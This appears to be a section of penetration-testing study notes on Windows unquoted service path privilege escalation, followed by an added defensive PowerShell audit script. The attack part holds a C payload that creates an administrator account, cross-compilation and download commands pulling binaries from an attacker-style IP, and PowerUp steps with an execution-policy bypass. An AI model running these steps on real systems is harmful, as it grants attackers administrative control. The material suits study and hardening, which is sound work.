7. Unquoted Service Paths

When a service binary path contains spaces and is not quoted, e.g.

C:\Program Files\My Program\My Service\service.exe
---------------------------------------------------
Windows tries these candidates, in this order, before reaching the real binary:

C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My service\service.exe

Unquoted Service Path Service Privesc:

  1. Enumerate running services for misconfigured paths (only works in cmd):
wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """
  2. Check for write access rights in the service's butchered search order with 'icacls'.
  3. Create a malicious binary. Example in C which will create a new user:
#include <stdlib.h>

/* Runs two "net" commands through the shell: add a user, then add it to Administrators. */
int main (void)
{
  int i;

  i = system ("net user dave2 password123! /add");
  i = system ("net localgroup administrators dave2 /add");
  (void) i;   /* return codes are not checked here */

  return 0;
}
  4. Cross-compile it to a 64-bit .exe for Windows:
x86_64-w64-mingw32-gcc <file>.c -o <file>.exe
  5. Serve the binary, download it, and move it to the correct directory:
iwr -uri http://192.168.119.3/adduser.exe -Outfile adduser.exe
move <pre-path> <post-path>
  6. Restart the service -- win!

Automatic Unquoted Service Path Privesc with PowerUp:

  1. Serve PowerUp.ps1 from your Kali machine.
  2. Download the script:
iwr -uri http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1
  3. Run the script with the execution policy bypassed:
powershell -ep bypass
. .\PowerUp.ps1
  4. Now check for vulnerable paths:
Get-UnquotedService
  5. Try the built-in AbuseFunction to install a service binary (where the name is the service name listed by the command above):
Write-ServiceBinary -Name '<servicename>' -Path "C:\Program Files\Enterprise Apps\Current.exe"
  6. Win!
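The defender-side counterpart to the manual enumeration and the PowerUp check above, as an added example that is not part of the original notes or of PowerUp: it lists unquoted service paths, builds the candidate binaries from the search order shown at the top of this section, flags candidate directories writable by broad groups (the same thing the icacls step looks for), and with -Fix rewrites the ImagePath with quotes. It assumes an elevated PowerShell session on the host being reviewed.

```powershell
# Added audit script (not from the original notes). Assumes an elevated session.
param([switch]$Fix)

$services = Get-CimInstance Win32_Service | Where-Object {
    $_.PathName -and $_.PathName -notmatch '^"' -and
    $_.PathName -match '^[A-Za-z]:\\' -and $_.PathName -notmatch '^[A-Za-z]:\\Windows\\'
}

foreach ($svc in $services) {
    # Split the binary (up to .exe) from any trailing arguments.
    if ($svc.PathName -notmatch '^(?<exe>.+?\.exe)(?<rest>.*)$') { continue }
    $exe = $Matches['exe']; $rest = $Matches['rest']
    if ($exe -notmatch ' ') { continue }      # no spaces: nothing for CreateProcess to misparse

    # Candidates tried before the real binary: C:\Program.exe, C:\Program Files\My.exe, ...
    $parts = $exe -split ' '
    $candidates = 1..($parts.Count - 1) | ForEach-Object { ($parts[0..($_ - 1)] -join ' ') + '.exe' }

    foreach ($cand in $candidates) {
        $dir = Split-Path -Path $cand -Parent
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        # Broad groups holding write-class rights on a candidate directory is the finding.
        # (Generic rights shown as raw integers are not matched by this string test.)
        $weak = (Get-Acl -LiteralPath $dir).Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $_.IdentityReference -match 'Everyone|Authenticated Users|BUILTIN\\Users|INTERACTIVE' -and
            $_.FileSystemRights -match 'Write|Modify|FullControl|CreateFiles'
        }
        if ($weak) {
            [pscustomobject]@{
                Service = $svc.Name; Candidate = $cand; Directory = $dir
                WritableBy = ($weak.IdentityReference | Select-Object -Unique) -join ', '
            }
        }
    }

    if ($Fix) {
        # Quoting the executable removes the ambiguity; ImagePath is what the SCM reads at start.
        $quoted = '"' + $exe + '"' + $rest
        Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)" `
                         -Name ImagePath -Value $quoted
    }
}
```

Run it without -Fix first to review the findings; -Fix writes the expanded path back, so services whose ImagePath used environment variables such as %SystemRoot% will have them replaced by the literal value.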